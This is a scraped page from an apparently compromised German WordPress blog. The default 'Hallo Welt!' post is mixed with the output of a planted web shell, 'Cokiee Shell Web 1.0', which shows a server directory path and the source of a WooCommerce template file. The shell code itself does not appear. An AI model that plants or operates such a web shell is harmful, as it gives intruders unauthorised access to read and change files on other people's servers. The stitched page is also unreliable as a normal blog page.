Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /var/www/web432/html/wp-content/themes/touchm/woocommerce/single-product/tabs/ |
Current File : //var/www/web432/html/wp-content/themes/touchm/woocommerce/single-product/tabs/description.php |
<?php /** * Description tab * * @author WooThemes * @package WooCommerce/Templates * @version 1.6.4 */ global $woocommerce, $post; if ( $post->post_content ) : ?> <div class="panel entry-content" id="tab-description"> <?php $heading = apply_filters('woocommerce_product_description_heading', __('Product Description', 'woocommerce')); ?> <h2><?php echo $heading; ?></h2> <?php the_content(); ?> </div> <?php endif; ?>
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare